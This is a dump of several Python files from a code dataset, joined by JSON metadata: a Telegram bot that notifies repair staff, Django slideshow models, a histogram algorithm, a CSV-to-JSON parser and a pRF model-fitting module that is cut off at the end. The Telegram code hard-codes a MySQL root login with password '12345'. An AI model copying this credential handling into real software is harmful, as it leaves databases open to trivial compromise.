def send_message_1(query_id, name, inv, place, cause, msg):  # notifies every master about a new repair request\n    import telebot\n    db = mysql.connector.connect(\n        host='localhost',\n        user='root',\n        passwd='12345',\n        port='3306',\n        database='ogm2'\n    )\n    cursor3 = db.cursor(buffered=True)\n    sql = "SELECT tg_id FROM employees WHERE (master = True)"\n    cursor3.execute(sql)\n    masters_id = cursor3.fetchall()\n    print(masters_id)\n\n    bot_2 = telebot.TeleBot('#')\n\n    keyboard = telebot.types.InlineKeyboardMarkup()\n    key_choose = telebot.types.InlineKeyboardButton('Назначить ...', callback_data='choose')\n    keyboard.add(key_choose)\n    key_postpone = telebot.types.InlineKeyboardButton('Отложить', callback_data='postpone')\n    keyboard.add(key_postpone)\n\n\n    #392674056\n    for i in masters_id:\n        try:\n            bot_2.send_message(i[0], "*НОВАЯ ЗАЯВКА*" + "\n" + "*id_заявки: *" + str(\n                query_id) + "\n" + "*Наименование: *" + name + "\n" +\n                "*Инв.№: *" + inv + "\n" + "*Участок: *" + place + "\n" + "*Причина поломки: *" +\n                cause + "\n" + "*Сообщение: *" + msg, reply_markup=keyboard, parse_mode="Markdown")\n        except:\n            pass\n\n\ndef send_message_2(id_employee, query_id):  # notifies an employee about a request assigned to them\n    import telebot\n    bot_3 = telebot.TeleBot('#')\n    db = mysql.connector.connect(\n        host='localhost',\n        user='root',\n        passwd='12345',\n        port='3306',\n        database='ogm2'\n    )\n    cursor3 = db.cursor(buffered=True)\n    sql = "SELECT equipment.eq_name, equipment.invnum, equipment.eq_type, equipment.area, " \\\n          "queries.reason, queries.msg FROM " \\\n          "equipment JOIN queries ON ((queries.query_id = %s) AND (queries.eq_id = equipment.eq_id)) "\n    val = (query_id,)\n    cursor3.execute(sql, val)\n    msg = cursor3.fetchone()\n    print(msg)\n\n    keyboard = telebot.types.InlineKeyboardMarkup()\n    key_start_now = telebot.types.InlineKeyboardButton('Начинаю выполнение', callback_data='start_now')\n    keyboard.add(key_start_now)\n    key_start_later = telebot.types.InlineKeyboardButton('Отложить', callback_data='start_later')\n    keyboard.add(key_start_later)\n\n    bot_3.send_message(id_employee, "У вас новая заявка" + "\n" + "*id_заявки: *" + str(query_id) + "\n" +\n                       "*Оборудование: *" + msg[0] + "\n" + "*Инв.№: *" + msg[1] + "\n" +\n                       "*Тип станка: *" + msg[2] + "\n" + "*Участок: *" + msg[3] + "\n" +\n                       "*Причина поломки: *" + msg[4] + "\n" + "*Сообщение: *" + str(msg[5]), reply_markup=keyboard,\n                       parse_mode="Markdown")\n\n    cursor3.close()\n\n\ndef send_message_3(query_id):  # forwards the request summary to a hard-coded chat id\n    import telebot\n    bot_3 = telebot.TeleBot('#')\n    db = mysql.connector.connect(\n        host='localhost',\n        user='root',\n        passwd='12345',\n        port='3306',\n        database='ogm2'\n    )\n    cursor3 = db.cursor(buffered=True)\n    sql = "SELECT equipment.eq_name, equipment.invnum, equipment.eq_type, equipment.area, " \\\n          "queries.reason, queries.msg FROM " \\\n          "equipment JOIN queries ON ((queries.query_id = %s) AND (queries.eq_id = equipment.eq_id)) "\n    val = (query_id,)\n    cursor3.execute(sql, val)\n    msg = cursor3.fetchone()\n\n    bot_3.send_message(392674056, "*id_заявки: *" + str(query_id) + "\n" +\n                       "*Оборудование: *" + msg[0] + "\n" + "*Инв.№: *" + msg[1] + "\n" +\n                       "*Тип станка: *" + msg[2] + "\n" + "*Участок: *" + msg[3] + "\n" +\n                       "*Причина поломки: *" + msg[4] + "\n" + "*Сообщение: *" + str(msg[5]), parse_mode="Markdown")\n
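    # NOTE: only the cursor is closed below; the MySQL connection itself is never
    # closed anywhere in this module and is left to garbage collection.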
cursor3.close()\n\n\n\n","sub_path":"Send_message.py","file_name":"Send_message.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"351539976","text":"from django.db import models\n\nfrom cms.models import CMSPlugin\nfrom filer.fields.image import FilerImageField\n\n\nclass Slider(CMSPlugin):\n title = models.CharField(max_length=50,\n blank=True,\n null=True,\n help_text=\"Title is optional and will be displayed\"\n \" above the slideshow.\"\n )\n\n\nclass Slide(CMSPlugin):\n image = FilerImageField()\n caption = models.CharField(max_length=55,\n blank=True,\n null=True,\n help_text=\"Caption is optional and will be\"\n \" displayed below the slide.\"\n )\n","sub_path":"my_site/slideshow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229418134","text":"def fn():\r\n n = int(input().strip())\r\n a = list(map(int,input().strip().split()))\r\n s = [0]\r\n area = 0\r\n maxi = 0\r\n\r\n for i in range(1,n):\r\n if(a[s[-1]] <= a[i]):\r\n s.append(i)\r\n else:\r\n while(len(s)!=0 and a[s[-1]] > a[i]):\r\n index = s.pop()\r\n if(len(s)!=0):\r\n area = (i-s[-1]-1)*a[index]\r\n else:\r\n area = i*a[index]\r\n\r\n maxi = max(maxi,area)\r\n s.append(i)\r\n \r\n i = n\r\n\r\n while(len(s)!=0):\r\n index = s.pop()\r\n if(len(s)==0):\r\n maxi = max(maxi,a[index]*n)\r\n else:\r\n maxi = max(maxi,(i-s[-1]-1)*a[index])\r\n\r\n print(maxi)\r\n\r\nfor _ in range(int(input().strip())):\r\n fn()","sub_path":"python/Maximum_Rectangular_Area_in_a_Histogram.py","file_name":"Maximum_Rectangular_Area_in_a_Histogram.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"285453106","text":"__author__ = 'mohanrandhava'\n\nimport csv\nimport json\nimport os.path\n\n\"\"\"\nParseCSV converts the data in 'csv_file' and converts each record\ninto a json object and places all results into 'json_file'.\n\"\"\"\n\nclass ParseCSV(object):\n\n def __init__(self, csv_file, json_file):\n self.json_file = json_file\n self.csv_file = csv_file\n\n def read_data(self):\n basepath = os.path.dirname(__file__)\n filepath = os.path.abspath(os.path.join(basepath, \"../..\", \"data\", self.csv_file))\n with open(filepath, 'r') as f:\n parsed_data = [row for row in csv.reader(f.read().splitlines())]\n return parsed_data\n\n def read_csv_as_json(self):\n basepath = os.path.dirname(__file__)\n filepath = os.path.abspath(os.path.join(basepath, \"../..\", \"data\", self.csv_file))\n f = open(filepath, 'r')\n headers = f.readline().strip().split(',')\n reader = csv.DictReader(f, headers)\n parsed_data = []\n counter = 1\n for row in reader:\n row['filmid'] = counter\n counter += 1\n parsed_data.append(row)\n return parsed_data\n\n def convert_csv_to_json(self):\n basepath = os.path.dirname(__file__)\n filepath = os.path.abspath(os.path.join(basepath, \"../..\", \"data\", self.json_file))\n jsonfile = open(filepath, 'w')\n for row in self.read_csv_as_json():\n json.dump(row, jsonfile)\n jsonfile.write('\\n')\n\np = 
ParseCSV(\"film_locations_in_san_francisco.csv\",\"film_locations_in_san_francisco.json\")\np.read_csv_as_json()","sub_path":"app/migration/parsing/ParseCSV.py","file_name":"ParseCSV.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"391711255","text":"import numpy as np\nfrom scipy.optimize import fmin_powell, minimize, basinhopping, shgo, dual_annealing\nfrom scipy.stats import pearsonr\nfrom copy import deepcopy\nfrom joblib import Parallel, delayed\n\n\ndef error_function(\n parameters,\n args,\n data,\n objective_function):\n \"\"\"\n Parameters\n ----------\n parameters : list or ndarray\n A tuple of values representing a model setting.\n args : dictionary\n Extra arguments to `objective_function` beyond those in `parameters`.\n data : ndarray\n The actual, measured time-series against which the model is fit.\n objective_function : callable\n The objective function that takes `parameters` and `args` and\n produces a model time-series.\n\n Returns\n -------\n error : float\n The residual sum of squared errors between the prediction and data.\n \"\"\"\n return np.nan_to_num(np.sum((data - objective_function(*list(parameters), **args))**2), nan=1)\n #return 1-np.nan_to_num(pearsonr(data,np.nan_to_num(objective_function(*list(parameters), **args)[0]))[0])\n\n\ndef iterative_search(model, data, start_params, args, xtol, ftol, verbose=True,\n bounds=None, constraints=None, **kwargs):\n \"\"\"iterative_search\n\n Generic minimization function called by iterative_fit.\n Do not call this directly. Use iterative_fit instead.\n\n [description]\n\n Parameters\n ----------\n model : Model\n Object that provides the predictions using its\n `return_prediction` method\n data : 1D numpy.ndarray\n the data to fit, same dimensions as are returned by\n Model's `return_prediction` method\n start_params : list or 1D numpy.ndarray\n initial values for the fit\n args : dictionary, arguments to model.return_prediction that\n are not optimized\n xtol : float, passed to fitting routine\n numerical tolerance on x\n ftol : float, passed to fitting routine\n numerical tolerance on function\n verbose : bool, optional\n whether to have minimizer output.\n bounds : list of tuples, optional\n Bounds for parameter minimization. Must have the same\n length as start_params. 
The default is None.\n constrains: list of scipy.optimize.LinearConstraints and/or\n scipy.optimize.NonLinearConstraints\n\n **kwargs : TYPE\n DESCRIPTION.\n\n Raises\n ------\n AssertionError\n Raised if parameters and bounds do not have the same length.\n\n Returns\n -------\n 2-tuple\n first element: parameter values,\n second element: rsq value\n \"\"\"\n if bounds is not None:\n assert len(bounds) == len(\n start_params), \"Unequal bounds and parameters\"\n\n\n if constraints is None:\n if verbose:\n print('Performing bounded, unconstrained minimization (L-BFGS-B).')\n\n output = minimize(error_function, start_params, bounds=bounds,\n args=(\n args, data, model.return_prediction),\n method='L-BFGS-B',\n # default max line searches is 20\n options=dict(ftol=ftol,\n maxls=40,\n disp=verbose))\n else:\n if verbose:\n print('Performing bounded, constrained minimization (trust-constr).')\n\n output = minimize(error_function, start_params, bounds=bounds,\n args=(args, data,\n model.return_prediction),\n method='trust-constr',\n constraints=constraints,\n tol=ftol,\n options=dict(xtol=xtol,\n disp=verbose))\n\n\n # output = basinhopping(error_function, start_params,\n # niter=10, T=0.01*(len(data) * data.var()), stepsize=2,\n # minimizer_kwargs=dict(method='L-BFGS-B',\n # bounds=bounds,\n # options=dict(maxls=60, disp=verbose),\n # args=(args, data, model.return_prediction)))\n\n # output = shgo(error_function, bounds=bounds,\n # args=(args, data, model.return_prediction),\n # options=dict(disp=verbose),\n # minimizer_kwargs=dict(method='L-BFGS-B',\n # bounds=bounds,\n # args=(args, data, model.return_prediction)))\n\n # output = dual_annealing(error_function, bounds=bounds,\n # args=(args, data, model.return_prediction),\n # x0=start_params)\n\n return np.nan_to_num(np.r_[output['x'], 1 -\n (output['fun'])/(len(data) * data.var())])\n\n else:\n if verbose:\n print('Performing unbounded, unconstrained minimization (Powell).')\n\n output = fmin_powell(\n error_function,\n start_params,\n xtol=xtol,\n ftol=ftol,\n args=(\n args,\n data,\n model.return_prediction),\n full_output=True,\n disp=verbose)\n\n return np.nan_to_num(np.r_[output[0], 1 - (output[1])/(len(data) * data.var())])\n\n\nclass Fitter:\n \"\"\"Fitter\n\n Superclass for classes that implement the different fitting methods,\n for a given model. It contains 2D-data and leverages a Model object.\n\n data should be two-dimensional so that all bookkeeping with regard to voxels,\n electrodes, etc is done by the user. Generally, a Fitter class should implement\n both a `grid_fit` and an `interative_fit` method to be run in sequence.\n\n \"\"\"\n\n def __init__(self, data, model, n_jobs=1, fit_hrf=False, **kwargs):\n \"\"\"__init__ sets up data and model\n\n Parameters\n ----------\n data : numpy.ndarray, 2D\n input data. First dimension units, Second dimension time\n model : prfpy.Model\n Model object that provides the grid and iterative search\n predictions.\n n_jobs : int, optional\n number of jobs to use in parallelization (iterative search), by default 1\n fit_hrf : boolean, optional\n Whether or not to fit two extra parameters for hrf derivative and\n dispersion. 
The default is False.\n \"\"\"\n assert len(data.shape) == 2, \\\n \"input data should be two-dimensional, with first dimension units and second dimension time\" \n\n \n self.data = data.astype('float32')\n \n self.model = model\n self.n_jobs = n_jobs\n self.fit_hrf = fit_hrf\n\n self.__dict__.update(kwargs)\n\n self.n_units = self.data.shape[0]\n self.n_timepoints = self.data.shape[-1]\n\n self.data_var = self.data.var(axis=-1)\n\n def iterative_fit(self,\n rsq_threshold,\n verbose=False,\n starting_params=None,\n bounds=None,\n args={},\n constraints=None,\n xtol=1e-4,\n ftol=1e-3):\n \"\"\"\n Generic function for iterative fitting. Does not need to be\n redefined for new models. It is sufficient to define\n `insert_new_model_params` or `grid_fit` in the new model Fitter class,\n or provide explicit `starting_params`\n (see Extend_Iso2DGaussianFitter for examples).\n\n\n Parameters\n ----------\n rsq_threshold : float\n Rsq threshold for iterative fitting. Must be between 0 and 1.\n verbose : boolean, optional\n Whether to print output. The default is False.\n starting_params : ndarray of size [units, model params +1], optional\n Explicit start for iterative fit. The default is None.\n bounds : list of tuples, optional\n Bounds for parameter minimization. The default is None.\n args : dictionary, optional\n Further arguments passed to iterative_search. The default is {}.\n constrains: list of scipy.optimize.LinearConstraints and/or\n scipy.optimize.NonLinearConstraints\n Returns\n -------\n None.\n\n \"\"\"\n\n self.bounds = bounds\n self.constraints = constraints\n\n if starting_params is None:\n assert hasattr(\n self, 'gridsearch_params'), 'First use self.grid_fit,\\\n or provide explicit starting parameters!'\n\n self.starting_params = self.gridsearch_params\n\n if self.fit_hrf:\n self.starting_params = np.insert(\n self.starting_params, -1, 1.0, axis=-1)\n self.starting_params = np.insert(\n self.starting_params, -1, 0.0, axis=-1)\n\n else:\n self.starting_params = starting_params\n \n if not hasattr(self,'rsq_mask'):\n #use the grid or explicitly provided params to select voxels to fit\n self.rsq_mask = self.starting_params[:, -1] > rsq_threshold\n\n self.iterative_search_params = np.zeros_like(self.starting_params)\n\n if self.rsq_mask.sum()>0:\n iterative_search_params = Parallel(self.n_jobs, verbose=verbose)(\n delayed(iterative_search)(self.model,\n data,\n start_params,\n args=args,\n xtol=xtol,\n ftol=ftol,\n verbose=verbose,\n bounds=self.bounds,\n constraints=self.constraints)\n for (data, start_params) in zip(self.data[self.rsq_mask], self.starting_params[self.rsq_mask, :-1]))\n self.iterative_search_params[self.rsq_mask] = np.array(\n iterative_search_params)\n \n \n def crossvalidate_fit(self,\n test_data,\n test_stimulus=None,\n single_hrf=True):\n \"\"\"\n Simple function to crossvalidate results of previous iterative fitting.\n \n\n Parameters\n ----------\n test_data : TYPE\n DESCRIPTION.\n test_stimulus : TYPE, optional\n DESCRIPTION. The default is None.\n single_hrf : TYPE, optional\n DESCRIPTION. 
The default is True.\n\n        Returns\n        -------\n        None.\n\n        """\n\n        assert hasattr(\n            self, 'iterative_search_params'), 'First use self.iterative_fit'\n\n        #to handle cases where test_data and fit_data have different stimuli\n        fit_stimulus = deepcopy(self.model.stimulus)\n        if test_stimulus is not None:\n            self.model.stimulus = test_stimulus\n\n        if self.rsq_mask.sum()>0:\n            if self.fit_hrf and single_hrf:\n                median_hrf_params = np.median(self.iterative_search_params[self.rsq_mask,-3:-1],\n                                              axis=0)\n\n                self.iterative_search_params[self.rsq_mask,-3:-1] = median_hrf_params\n\n\n            test_predictions = self.model.return_prediction(*list(self.iterative_search_params[self.rsq_mask,:-1].T))\n            self.model.stimulus = fit_stimulus\n\n            #calculate CV-rsq\n            CV_rsq = np.nan_to_num(1-np.sum((test_data[self.rsq_mask]-test_predictions)**2, axis=-1)/(test_data.shape[-1]*test_data[self.rsq_mask].var(-1)))\n            #calculate CV-correlation\n            #CV_rsq = np.zeros(self.rsq_mask.sum())\n            #for i in range(len(CV_rsq)):\n            #    CV_rsq[i] = np.nan_to_num(pearsonr(test_data[self.rsq_mask][i],np.nan_to_num(test_predictions[i]))[0])\n\n            self.iterative_search_params[self.rsq_mask,-1] = CV_rsq\n        else:\n            print("No voxels/vertices above Rsq threshold were found.")\n\n\n        if self.data.shape == test_data.shape:\n\n            self.noise_ceiling = np.zeros(self.n_units)\n\n            n_c = 1-np.sum((test_data[self.rsq_mask]-self.data[self.rsq_mask])**2, axis=-1)/(test_data.shape[-1]*test_data[self.rsq_mask].var(-1))\n\n            self.noise_ceiling[self.rsq_mask] = n_c\n\n\n\n\nclass Iso2DGaussianFitter(Fitter):\n    """Iso2DGaussianFitter\n\n    Class that implements the different fitting methods\n    on a two-dimensional isotropic Gaussian pRF model,\n    leveraging a Model object.\n\n    """\n\n    def grid_fit(self,\n                 ecc_grid,\n                 polar_grid,\n                 size_grid,\n                 verbose=False,\n                 n_batches=1000,\n                 pos_prfs_only=True):\n        """grid_fit\n\n        performs grid fit using provided grids and predictor definitions\n\n\n        Parameters\n        ----------\n        ecc_grid : 1D ndarray\n            to be filled in by user\n        polar_grid : 1D ndarray\n            to be filled in by user\n        size_grid : 1D ndarray\n            to be filled in by user\n        verbose : boolean, optional\n            print output. 
The default is False.\n n_batches : int, optional\n The grid fit is performed in parallel over n_batches of units.\n Batch parallelization is faster than single-unit\n parallelization and of sequential computing.\n pos_prfs_only : bool, optional\n Enforce positive PRFs only.\n\n Returns\n -------\n None.\n\n \"\"\"\n # let the model create the timecourses\n self.model.create_grid_predictions(ecc_grid=ecc_grid,\n polar_grid=polar_grid,\n size_grid=size_grid)\n self.model.predictions = self.model.predictions.astype('float32')\n\n # this function analytically computes best-fit rsq, slope, and baseline\n # for a given batch of units (faster than scipy/numpy lstsq).\n def rsq_betas_for_batch(data, vox_num, predictions,\n n_timepoints, data_var,\n sum_preds, square_norm_preds):\n result = np.zeros((data.shape[0], 4), dtype='float32')\n for vox_data, num, idx in zip(\n data, vox_num, np.arange(\n data.shape[0])):\n # bookkeeping\n sumd = np.sum(vox_data)\n\n # best slopes and baselines for voxel for predictions\n slopes = (n_timepoints * np.dot(vox_data, predictions.T) - sumd *\n sum_preds) / (n_timepoints * square_norm_preds - sum_preds**2)\n baselines = (sumd - slopes * sum_preds) / n_timepoints\n\n # resid and rsq\n resid = np.linalg.norm((vox_data -\n slopes[..., np.newaxis] *\n predictions -\n baselines[..., np.newaxis]), axis=-\n 1, ord=2)\n\n #to enforce, if possible, positive prf amplitude\n if pos_prfs_only:\n if np.any(slopes>0):\n resid[slopes<=0] = +np.inf\n\n best_pred_voxel = np.nanargmin(resid)\n rsq = 1 - resid[best_pred_voxel]**2 / \\\n (n_timepoints * data_var[num])\n\n result[idx, :] = best_pred_voxel, rsq, baselines[best_pred_voxel], slopes[best_pred_voxel]\n\n return result\n\n # bookkeeping\n sum_preds = np.sum(self.model.predictions, axis=-1)\n square_norm_preds = np.linalg.norm(\n self.model.predictions, axis=-1, ord=2)**2\n\n # split data in batches\n split_indices = np.array_split(\n np.arange(self.data.shape[0]), n_batches)\n data_batches = np.array_split(self.data, n_batches, axis=0)\n if verbose:\n print(\"Each batch contains approx. \" +\n str(data_batches[0].shape[0]) + \" voxels.\")\n\n # perform grid fit\n grid_search_rbs = Parallel(self.n_jobs, verbose=verbose)(\n delayed(rsq_betas_for_batch)(\n data=data,\n vox_num=vox_num,\n predictions=self.model.predictions,\n n_timepoints=self.n_timepoints,\n data_var=self.data_var,\n sum_preds=sum_preds,\n square_norm_preds=square_norm_preds)\n for data, vox_num in zip(data_batches, split_indices))\n\n grid_search_rbs = np.concatenate(grid_search_rbs, axis=0)\n\n max_rsqs = grid_search_rbs[:, 0].astype('int')\n self.gridsearch_r2 = grid_search_rbs[:, 1]\n self.best_fitting_baseline = grid_search_rbs[:, 2]\n self.best_fitting_beta = grid_search_rbs[:, 3]\n\n # output\n self.gridsearch_params = np.array([\n self.model.xs.ravel()[max_rsqs],\n self.model.ys.ravel()[max_rsqs],\n self.model.sizes.ravel()[max_rsqs],\n self.best_fitting_beta,\n self.best_fitting_baseline,\n self.gridsearch_r2\n ]).T\n\n\nclass Extend_Iso2DGaussianFitter(Iso2DGaussianFitter):\n \"\"\"\n\n Generic superclass to extend the Gaussian Fitter. If an existing\n Iso2DGaussianFitter object with iterative_search_params is provided, the\n prf position, size, and rsq parameters will be used for further minimizations.\n\n \"\"\"\n\n def __init__(self, model, data, n_jobs=1, fit_hrf=False,\n previous_gaussian_fitter=None,\n **kwargs):\n \"\"\"\n\n Parameters\n ----------\n data : numpy.ndarray, 2D\n input data. 
First dimension units, Second dimension time\n model : prfpy.Model\n Model object that provides the grid and iterative search\n predictions.\n n_jobs : int, optional\n number of jobs to use in parallelization (iterative search), by default 1\n previous_gaussian_fitter : Iso2DGaussianFitter, optional\n Must have iterative_search_params. The default is None.\n **kwargs : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n if previous_gaussian_fitter is not None:\n if not hasattr(previous_gaussian_fitter,\n 'iterative_search_params'):\n print('Warning: gaussian iter fit not performed. Explicit\\\n starting parameters or grid params will be needed.')\n\n self.previous_gaussian_fitter = previous_gaussian_fitter\n\n super().__init__(data, model, n_jobs=n_jobs, fit_hrf=fit_hrf, **kwargs)\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Function to insert new model parameters starting values for iterfitting.\n To be redefined appropriately for each model (see below for examples).\n If `grid_fit` is defined and performed, `self.gridsearch_params` take\n precedence, and this function becomes unnecessary.\n\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, number of new model parameters]\n Starting parameters for iterative fit.\n To be redefined appropriately for each model.\n\n \"\"\"\n\n new_params = old_params\n return new_params\n\n def iterative_fit(self,\n rsq_threshold,\n verbose=False,\n starting_params=None,\n bounds=None,\n args={},\n constraints=[],\n xtol=1e-4,\n ftol=1e-3):\n \"\"\"\n Iterative_fit for models building on top of the Gaussian. Does not need to be\n redefined for new models. It is sufficient to define either\n `insert_new_model_params` or `grid_fit`, in a new model Fitter class,\n or provide explicit `starting_params`.\n\n\n Parameters\n ----------\n rsq_threshold : float\n Rsq threshold for iterative fitting. Must be between 0 and 1.\n verbose : boolean, optional\n Whether to print output. The default is False.\n starting_params : ndarray of size [units, model_params +1], optional\n Explicit start for minimization. The default is None.\n bounds : list of tuples, optional\n Bounds for parameter minimization. The default is None.\n args : dictionary, optional\n Further arguments passed to iterative_search. The default is {}.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n if starting_params is None and not hasattr(\n self, 'gridsearch_params') and hasattr(\n self, 'previous_gaussian_fitter'):\n\n starting_params = self.insert_new_model_params(\n self.previous_gaussian_fitter.iterative_search_params)\n \n #fit exactly the same voxels/vertices as previous\n if hasattr(self.previous_gaussian_fitter, 'rsq_mask'):\n self.rsq_mask = self.previous_gaussian_fitter.rsq_mask\n else:\n self.rsq_mask = self.previous_gaussian_fitter.gridsearch_params[:,-1] > rsq_threshold\n\n # enforcing hrf_fit \"consistency\" with previous gaussian fit:\n if self.previous_gaussian_fitter.fit_hrf != self.fit_hrf:\n\n print(\"Warning: fit_hrf was \" + str(\n self.previous_gaussian_fitter.fit_hrf) + \" in previous_\\\n gaussian_fit. 
Overriding current fit_hrf to avoid inconsistency.\")\n\n self.fit_hrf = self.previous_gaussian_fitter.fit_hrf\n\n super().iterative_fit(rsq_threshold=rsq_threshold,\n verbose=verbose,\n starting_params=starting_params,\n bounds=bounds,\n args=args,\n constraints=constraints,\n xtol=xtol,\n ftol=ftol)\n\n\nclass CSS_Iso2DGaussianFitter(Extend_Iso2DGaussianFitter):\n \"\"\"CSS_Iso2DGaussianFitter\n\n Compressive Spatial Summation model\n \"\"\"\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, 7]\n Starting parameters and rsq for CSS iterative fit.\n\n \"\"\"\n # insert CSS exponent\n new_params = np.insert(old_params, 5, 1.0, axis=-1)\n return new_params\n\n\nclass DoG_Iso2DGaussianFitter(Extend_Iso2DGaussianFitter):\n \"\"\"DoG_Iso2DGaussianFitter\n\n Difference of Gaussians model\n \"\"\"\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, 8]\n Starting parameters and rsq for DoG iterative fit.\n\n \"\"\"\n # surround amplitude\n new_params = np.insert(old_params, 5, 0.5*old_params[:,3], axis=-1)\n # surround size\n new_params = np.insert(\n new_params,\n 6,\n 1.5*old_params[:,2],\n axis=-1)\n\n return new_params\n\n\nclass Norm_Iso2DGaussianFitter(Extend_Iso2DGaussianFitter):\n \"\"\"Norm_Iso2DGaussianFitter\n\n Divisive Normalization model\n\n \"\"\"\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Note: this function is generally unused since there is an\n efficient grid_fit for the normalization model (below)\n\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, 10]\n Starting parameters and rsq for norm iterative fit.\n\n \"\"\"\n # surround amplitude\n new_params = np.insert(old_params, 5, 0.0, axis=-1)\n # surround size\n new_params = np.insert(\n new_params,\n 6,\n 1.5*old_params[:,2],\n axis=-1)\n # neural baseline\n new_params = np.insert(new_params, 7, 0.0, axis=-1)\n # surround baseline\n new_params = np.insert(new_params, 8, 1.0, axis=-1)\n\n return new_params\n\n def grid_fit(self,\n surround_amplitude_grid,\n surround_size_grid,\n neural_baseline_grid,\n surround_baseline_grid,\n gaussian_params=None,\n verbose=False,\n n_batches=1000,\n rsq_threshold=0.1,\n pos_prfs_only=True):\n \"\"\"\n This function performs a grid_fit for the normalization model new parameters.\n The fit is parallel over batches of voxels, and separate predictions are\n made for each voxels based on its previously obtained Gaussian parameters (position and size).\n These can be provided explicitly in `gaussian_params`, or otherwise\n they are obtained from `previous_gaussian_fitter.iterative_search_params`\n\n\n Parameters\n ----------\n surround_amplitude_grid : 1D ndarray\n Array of surround amplitude values.\n surround_size_grid : 1D ndarray\n Array of surround size values.\n neural_baseline_grid : 1D ndarray\n Array of neural baseline values.\n surround_baseline_grid : 1D ndarray\n Array of surround baseline values.\n gaussian_params : ndarray [n_units, 4], optional\n The Gaussian parms [x position, y position, prf size, rsq] can be\n provided explicitly. If not, a previous_gaussian_fitter must be\n provided. 
The default is None.\n verbose : boolean, optional\n print output. The default is False.\n n_batches : int, optional\n Number of voxel batches. The default is 1000.\n rsq_threshold : float, optional\n rsq threshold for grid fitting. The default is 0.1.\n\n Raises\n ------\n ValueError\n Raised if there is no previous_gaussian_fitter or gaussian params.\n\n \"\"\"\n\n # setting up grid for norm model new params\n self.sa, self.ss, self.nb, self.sb = np.meshgrid(\n surround_amplitude_grid, surround_size_grid,\n neural_baseline_grid, surround_baseline_grid)\n\n self.sa = self.sa.ravel()\n self.ss = self.ss.ravel()\n self.nb = self.nb.ravel()\n self.sb = self.sb.ravel()\n\n self.n_predictions = len(self.nb)\n\n if gaussian_params is not None and gaussian_params.shape == (\n self.n_units, 4):\n self.gaussian_params = gaussian_params.astype('float32')\n self.gridsearch_rsq_mask = self.gaussian_params[:, -1] > rsq_threshold\n \n elif hasattr(self, 'previous_gaussian_fitter'):\n starting_params_grid = self.previous_gaussian_fitter.iterative_search_params\n self.gaussian_params = np.concatenate(\n (starting_params_grid[:, :3], starting_params_grid[:, -1][..., np.newaxis]), axis=-1)\n \n if hasattr(self.previous_gaussian_fitter, 'rsq_mask'):\n self.gridsearch_rsq_mask = self.previous_gaussian_fitter.rsq_mask\n else:\n self.gridsearch_rsq_mask = self.previous_gaussian_fitter.gridsearch_params[:, -1] > self.rsq_threshold\n \n else:\n print('Please provide suitable [n_units, 4] gaussian_params,\\\n or previous_gaussian_fitter')\n raise ValueError\n\n \n\n # this function analytically computes best-fit rsq, slope, and baseline\n # for a given batch of units (faster than scipy/numpy lstsq).\n def rsq_betas_for_batch(data,\n vox_nums,\n n_predictions,\n n_timepoints,\n data_var,\n sa, ss, nb, sb,\n gaussian_params):\n\n result = np.zeros((data.shape[0], 4), dtype='float32')\n\n for vox_data, vox_num, idx in zip(\n data, vox_nums, np.arange(\n data.shape[0])):\n\n # let the model create the timecourses, per voxel, since the\n # gridding is over new parameters, while size and position\n # are obtained from previous Gaussian fit\n predictions = self.model.create_grid_predictions(\n gaussian_params[vox_num, :-1], n_predictions, n_timepoints, sa, ss, nb, sb)\n # bookkeeping\n sum_preds = np.sum(predictions, axis=-1)\n square_norm_preds = np.linalg.norm(\n predictions, axis=-1, ord=2)**2\n sumd = np.sum(vox_data)\n\n # best possible slopes and baselines\n slopes = (n_timepoints * np.dot(vox_data, predictions.T) - sumd *\n sum_preds) / (n_timepoints * square_norm_preds - sum_preds**2)\n baselines = (sumd - slopes * sum_preds) / n_timepoints\n\n # find best prediction and store relevant data\n resid = np.linalg.norm((vox_data -\n slopes[..., np.newaxis] *\n predictions -\n baselines[..., np.newaxis]), ord=2, axis=-\n 1)\n\n #to enforce, if possible, positive prf amplitude & neural baseline\n if pos_prfs_only:\n if np.any(slopes>0):\n resid[slopes<=0] = +np.inf\n\n best_pred_voxel = np.nanargmin(resid)\n\n rsq = 1 - resid[best_pred_voxel]**2 / \\\n (n_timepoints * data_var[vox_num])\n\n result[idx, :] = best_pred_voxel, rsq, baselines[best_pred_voxel], slopes[best_pred_voxel]\n\n return result\n\n # masking and splitting data\n split_indices = np.array_split(np.arange(self.data.shape[0])[\n self.gridsearch_rsq_mask], n_batches)\n data_batches = np.array_split(\n self.data[self.gridsearch_rsq_mask], n_batches, axis=0)\n\n if verbose:\n print(\"Each batch contains approx. 
